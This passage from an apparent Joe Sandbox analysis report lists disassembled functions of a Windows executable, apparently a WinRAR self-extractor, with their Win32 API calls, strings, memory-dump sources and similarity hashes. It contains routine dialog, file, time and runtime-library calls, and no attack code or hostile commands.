                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00451316: GetDlgItem.USER32(00000000,00003021), ref: 0045135A
                                                                    • Part of subcall function 00451316: SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
                                                                  • EndDialog.USER32(?,00000001), ref: 0046B610
                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0046B637
                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0046B650
                                                                  • SetWindowTextW.USER32(?,?), ref: 0046B661
                                                                  • GetDlgItem.USER32(?,00000065), ref: 0046B66A
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0046B67E
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0046B694
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                                                  • String ID: LICENSEDLG
                                                                  • API String ID: 3214253823-2177901306
                                                                  • Opcode ID: d1ca44bd13d8d444b81eb4bc9b6ec63b76ff4aa275921088585ca442f3eadbe2
                                                                  • Instruction ID: 2c973153cf1bf023238fdcf0040887b292e72f6ee013714947279902f94aa4dd
                                                                  • Opcode Fuzzy Hash: d1ca44bd13d8d444b81eb4bc9b6ec63b76ff4aa275921088585ca442f3eadbe2
                                                                  • Instruction Fuzzy Hash: F521D332600205BBD211AF67ED49F3B3B6CEB46B56F01403AF600D65A0EB6A9941967F
                                                                  Function 0046FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,C566B0C9,00000001,00000000,00000000,?,?,0045AF6C,ROOT\CIMV2), ref: 0046FD99
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0045AF6C,ROOT\CIMV2), ref: 0046FE14
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0046FE1F
                                                                  • _com_issue_error.COMSUPP ref: 0046FE48
                                                                  • _com_issue_error.COMSUPP ref: 0046FE52
                                                                  • GetLastError.KERNEL32(80070057,C566B0C9,00000001,00000000,00000000,?,?,0045AF6C,ROOT\CIMV2), ref: 0046FE57
                                                                  • _com_issue_error.COMSUPP ref: 0046FE6A
                                                                  • GetLastError.KERNEL32(00000000,?,?,0045AF6C,ROOT\CIMV2), ref: 0046FE80
                                                                  • _com_issue_error.COMSUPP ref: 0046FE93
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                  • String ID:
                                                                  • API String ID: 1353541977-0
                                                                  • Opcode ID: 5823dfeb070749a7288e7a53552eb90859a5c4232380449c59d2feb9e64f00d4
                                                                  • Instruction ID: c85f0dc0262f2329748553876529bf506dc4139218df650a96bd6a07c56c1ae1
                                                                  • Opcode Fuzzy Hash: 5823dfeb070749a7288e7a53552eb90859a5c4232380449c59d2feb9e64f00d4
                                                                  • Instruction Fuzzy Hash: C941F971A00205ABC7109F69EC45BAFBBA8EF44B14F20463FF945E7351E739990487AA
                                                                  Function 00459382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00459387
                                                                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004593AA
                                                                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004593C9
                                                                    • Part of subcall function 0045C29A: _wcslen.LIBCMT ref: 0045C2A2
                                                                    • Part of subcall function 00461FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0045C116,00000000,.exe,?,?,00000800,?,?,?,00468E3C), ref: 00461FD1
                                                                  • _swprintf.LIBCMT ref: 00459465
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                  • MoveFileW.KERNEL32(?,?), ref: 004594D4
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00459514
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                  • String ID: rtmp%d
                                                                  • API String ID: 3726343395-3303766350
                                                                  • Opcode ID: 603d31206cb6bfc6dd518e0205896ea1c1be0a7bcf588cef40fa0d3bd04d8d17
                                                                  • Instruction ID: af3c5fb2052a65cbf69e75593d03581909fa64ac5fb00731be8ead5d8e9def51
                                                                  • Opcode Fuzzy Hash: 603d31206cb6bfc6dd518e0205896ea1c1be0a7bcf588cef40fa0d3bd04d8d17
                                                                  • Instruction Fuzzy Hash: 19415672900258B5CF21AB61CD45DDF737CAF45745F0048ABBA49A3153EA3C8F9D8B68
                                                                  Function 00451100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID: UF$pF$zF
                                                                  • API String ID: 176396367-3070487249
                                                                  • Opcode ID: 664f5fc67130db215190e90283a9da0cf3a8aa0eaf6dc1ced24e37858a902ee6
                                                                  • Instruction ID: 6d91320bec6a4a506a9155c1b83867d11731196722cf1d6201a5c98b383a3b56
                                                                  • Opcode Fuzzy Hash: 664f5fc67130db215190e90283a9da0cf3a8aa0eaf6dc1ced24e37858a902ee6
                                                                  • Instruction Fuzzy Hash: EB41F7719006255BCB11AF69CC05ADF7BB8EF00311F00002EFD46F7256DB34AE498BA9
                                                                  Function 00469ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(?,00000000), ref: 00469EEE
                                                                  • GetWindowRect.USER32(?,00000000), ref: 00469F44
                                                                  • ShowWindow.USER32(?,00000005,00000000), ref: 00469FDB
                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00469FE3
                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00469FF9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$RectText
                                                                  • String ID: F$RarHtmlClassName
                                                                  • API String ID: 3937224194-807982621
                                                                  • Opcode ID: 3bf02cd5c8a3c5dc8cc774fecc3ee5013d064ba566cc5aedb0a721a313a75290
                                                                  • Instruction ID: 5056af03c6828aa8b3139bde14ffe5c0a07632f665a75ea9c8866d233abf6096
                                                                  • Opcode Fuzzy Hash: 3bf02cd5c8a3c5dc8cc774fecc3ee5013d064ba566cc5aedb0a721a313a75290
                                                                  • Instruction Fuzzy Hash: 8A41E331004210AFC7215F69DC48B6B7BACFF48706F00862AF909AA156EB78DD15CF6A
                                                                  Function 00461218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __aulldiv.LIBCMT ref: 0046122E
                                                                    • Part of subcall function 0045B146: GetVersionExW.KERNEL32(?), ref: 0045B16B
                                                                  • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00461251
                                                                  • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00461263
                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00461274
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00461284
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00461294
                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004612CF
                                                                  • __aullrem.LIBCMT ref: 00461379
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                  • String ID:
                                                                  • API String ID: 1247370737-0
                                                                  • Opcode ID: 1de44b59aa8897328a7cb3f1a47d0eaae8aa3f91894322271c6444970a9a9464
                                                                  • Instruction ID: c9a21364e32fba82cb62253d53e473572723bce02fd02748e9f745f7f4f44820
                                                                  • Opcode Fuzzy Hash: 1de44b59aa8897328a7cb3f1a47d0eaae8aa3f91894322271c6444970a9a9464
                                                                  • Instruction Fuzzy Hash: B34105B1508305AFD710DF65C88496BBBE9FB88715F04892EF996C2210E738E649CB56
                                                                  Function 00452210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _swprintf.LIBCMT ref: 00452536
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                    • Part of subcall function 004605DA: _wcslen.LIBCMT ref: 004605E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                  • String ID: ;%u$x%u$xc%u
                                                                  • API String ID: 3053425827-2277559157
                                                                  • Opcode ID: a23651fc86017a8e0839cfd8d159871e30768807169c5704172d7c1f8a678243
                                                                  • Instruction ID: 1e8474176999aa2a4a102ddeda9676060f7bbe3236d4ab6bc2d2c1b8b9d025ea
                                                                  • Opcode Fuzzy Hash: a23651fc86017a8e0839cfd8d159871e30768807169c5704172d7c1f8a678243
                                                                  • Instruction Fuzzy Hash: 42F157706043409BCB25EB2585D1BAE77955F92309F08056FEC869B383DBAC984DC7AA
                                                                  Function 00469CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID: </p>$</style>$<br>$<style>$>
                                                                  • API String ID: 176396367-3568243669
                                                                  • Opcode ID: f17203123c7afdc39b17ad3830f204bfe50533104fb171e86d030473e42a79e2
                                                                  • Instruction ID: f501c2594a66377e8257460d8a0947b1b38da027aa447767c26198f17ab6e0d7
                                                                  • Opcode Fuzzy Hash: f17203123c7afdc39b17ad3830f204bfe50533104fb171e86d030473e42a79e2
                                                                  • Instruction Fuzzy Hash: 3B51D56664132395DB349A65981177773A8DFA1750F68042BE9819B3C0FBFE8C81836F
                                                                  Function 0047F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0047FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0047F6CF
                                                                  • __fassign.LIBCMT ref: 0047F74A
                                                                  • __fassign.LIBCMT ref: 0047F765
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0047F78B
                                                                  • WriteFile.KERNEL32(?,00000000,00000000,0047FE02,00000000,?,?,?,?,?,?,?,?,?,0047FE02,00000000), ref: 0047F7AA
                                                                  • WriteFile.KERNEL32(?,00000000,00000001,0047FE02,00000000,?,?,?,?,?,?,?,?,?,0047FE02,00000000), ref: 0047F7E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1324828854-0
                                                                  • Opcode ID: 409da093a75c69def3f09c21c17496e1abeff1898b84498ef82176c1736c8a51
                                                                  • Instruction ID: db1bdb387fb8bbaa6390b560a8a5a75e8d93bcb5b794c703e2c6abb8b0333636
                                                                  • Opcode Fuzzy Hash: 409da093a75c69def3f09c21c17496e1abeff1898b84498ef82176c1736c8a51
                                                                  • Instruction Fuzzy Hash: D851F6B1D002099FCB14CFA8DD45AEEBBF4EF09300F14816BE955E7251D734AA45CBA9
                                                                  Function 0046CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000800,?), ref: 0046CE9D
                                                                    • Part of subcall function 0045B690: _wcslen.LIBCMT ref: 0045B696
                                                                  • _swprintf.LIBCMT ref: 0046CED1
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                  • SetDlgItemTextW.USER32(?,00000066,0049946A), ref: 0046CEF1
                                                                  • _wcschr.LIBVCRUNTIME ref: 0046CF22
                                                                  • EndDialog.USER32(?,00000001), ref: 0046CFFE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                  • String ID: %s%s%u
                                                                  • API String ID: 689974011-1360425832
                                                                  • Opcode ID: 21c26ce57ce02530f800ac93efa109fc13358c7bceaeb9451fe52abfcfa42122
                                                                  • Instruction ID: d9d75539041a5f2d7df9d09bc061f3fb00860051c59b63c30297886143ef23a0
                                                                  • Opcode Fuzzy Hash: 21c26ce57ce02530f800ac93efa109fc13358c7bceaeb9451fe52abfcfa42122
                                                                  • Instruction Fuzzy Hash: C8418471900218AADF259F54DC85AEE77BCEB04305F4084ABF909E7141FA788E848F6A
                                                                  Function 00472900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 00472937
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0047293F
                                                                  • _ValidateLocalCookies.LIBCMT ref: 004729C8
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 004729F3
                                                                  • _ValidateLocalCookies.LIBCMT ref: 00472A48
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm
                                                                  • API String ID: 1170836740-1018135373
                                                                  • Opcode ID: aa19ddc957e1df99fdf7076f39fb713a42b1cb874a50e72ee896783d7ddf762e
                                                                  • Instruction ID: 8907f0f1beb479eb49036437f66359558885f132e40ff7d20b8490e8da9ee2fa
                                                                  • Opcode Fuzzy Hash: aa19ddc957e1df99fdf7076f39fb713a42b1cb874a50e72ee896783d7ddf762e
                                                                  • Instruction Fuzzy Hash: 5641F974A00208AFCF10EF29C881ADE7BB1EF44314F14C06BE9186B352C7B9DA45CB95
                                                                  Function 00469955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                  • API String ID: 176396367-3743748572
                                                                  • Opcode ID: 99ce501116e6883b3b8c6ad1f9aaefbc8c4ad2ca7b880bd00a275e72147c281e
                                                                  • Instruction ID: afce683c444ff777f2a0bf37de135ada08faf29935b7bd33be9f90c047195b40
                                                                  • Opcode Fuzzy Hash: 99ce501116e6883b3b8c6ad1f9aaefbc8c4ad2ca7b880bd00a275e72147c281e
                                                                  • Instruction Fuzzy Hash: F9315C7264438166D630AF945C027BB73E8EB80324F60841FE48697380FAFCAD4583AF
                                                                  Function 0047C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0047C868: _free.LIBCMT ref: 0047C891
                                                                  • _free.LIBCMT ref: 0047C8F2
                                                                    • Part of subcall function 00478DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34), ref: 00478DE2
                                                                    • Part of subcall function 00478DCC: GetLastError.KERNEL32(00483A34,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34,00483A34), ref: 00478DF4
                                                                  • _free.LIBCMT ref: 0047C8FD
                                                                  • _free.LIBCMT ref: 0047C908
                                                                  • _free.LIBCMT ref: 0047C95C
                                                                  • _free.LIBCMT ref: 0047C967
                                                                  • _free.LIBCMT ref: 0047C972
                                                                  • _free.LIBCMT ref: 0047C97D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                  • Instruction ID: 5052e116d3c370da901e9efc87e1316b4caecccbaeae94b599072deeafb7b29a
                                                                  • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                  • Instruction Fuzzy Hash: D8114F71580B04EAE530B7B2CC8BFCB7BAC9F10B09F418C1EB29D76093DA69B5098755
                                                                  Function 0046E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0046E669,0046E5CC,0046E86D), ref: 0046E605
                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0046E61B
                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0046E630
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
